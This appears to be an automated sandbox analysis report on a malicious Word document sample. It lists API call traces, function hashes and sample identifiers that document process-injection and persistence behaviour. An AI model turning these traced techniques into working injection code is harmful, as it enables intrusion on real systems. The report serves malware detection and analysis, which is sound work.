    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: AD7B9C14083B52BC532FBA5948342B98
Total matches: 247
Initial sample Analysis ID: 544867
Initial sample SHA 256: 1C63CA41136F1CBE7E2E541D92D6B3EB70A79374F172FBD7157DA4018BFEB8D2
Initial sample name: THE_HARRION_LAW_FIRM_Request.doc

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
